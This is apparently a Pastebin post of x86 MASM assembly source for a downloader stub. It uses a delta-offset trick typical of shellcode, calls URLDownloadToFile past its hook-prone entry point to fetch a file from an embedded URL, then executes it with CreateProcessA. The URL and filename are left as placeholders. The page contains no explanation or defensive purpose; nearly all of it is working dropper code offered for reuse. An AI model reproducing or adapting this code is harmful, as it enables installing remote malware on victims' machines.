Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- .386
- .model flat,stdcall
- option casemap:none
- ;vDownUrl.inc content:
- ;include kernel32.inc
- ;include urlmon.inc
- ;includelib kernel32.lib
- ;includelib urlmon.lib
- ;.data?
- ;urldir db 255 dup (?)
- ;filename db 255 dup (?)
- ;offs3t db 4 dup (?)
- ;pinfo dd 4 dup (0) ;process handles
- ;startupinfo db 48h dup (0) ;startup info for the process were opening
- include vDownUrl.inc
- .code
- main:
- call DELTA ;GETTING DELTA OFFSET }:)
- DELTA:
- lea eax,[esp-1]
- inc eax
- lea ebx,[DELTA+1]
- dec ebx
- mov eax,[eax]
- sub eax,ebx
- mov ebp,eax ;EBP = DELTA OFFSET
- ;END
- lenFile:
- xor ebx,ebx
- xor dl,dl
- mov eax, offset [FILE_+2] ;loop for count length bytes of FILE string
- .while byte ptr [eax+ebx]!=dl
- inc ebx
- .endw
- mov dword ptr [offs3t+ebp],ebx ;save length
- getOffsets:
- jmp short FILE ;GETTING ARGS OFFSETS
- OFFFILE:
- pop edx ;FILE NAME OFFSET
- mov dword ptr [filename+ebp],edx
- lea ebx,[offs3t+ebp]
- mov ebx,[ebx]
- add ebx,URL ;add length bytes of FILE string to fix JMP
- jmp ebx
- OFFURL:
- pop edx ;URL OFFSET
- mov dword ptr [urldir+ebp],edx
- ;END
- sCode: ;REAL SOURCE CODE HERE!!!
- xor ecx,ecx
- push ecx
- push ecx
- lea eax,[filename+ebp] ;FILE
- mov eax,[eax]
- push eax
- lea eax,[urldir+ebp] ;URL
- mov eax,[eax]
- push eax
- push ecx
- ;call URLDownloadToFile
- mov eax,URLDownloadToFile
- inc eax
- inc eax
- mov edi,edi
- call eax ;URLDownloadToFile
- lea eax,[pinfo+ebp]
- push eax
- lea eax,[startupinfo+ebp]
- push eax
- xor ecx,ecx
- push ecx
- push ecx
- push ecx
- push 1
- push ecx
- push ecx
- push ecx
- lea eax,[filename+ebp] ;FILE
- mov eax,[eax]
- push eax
- call CreateProcessA ;CreateProcessA
- xor ecx,ecx
- push ecx
- call ExitProcess ;ExitProcess
- FILE:
- lea ebx,[OFFFILE+ebp]
- FILE_:
- call ebx
- nop ;FILE NAME HERE
- URL:
- lea ebx,OFFURL
- call ebx
- nop ;URL HERE
- end main
Add Comment
Please, Sign In to add comment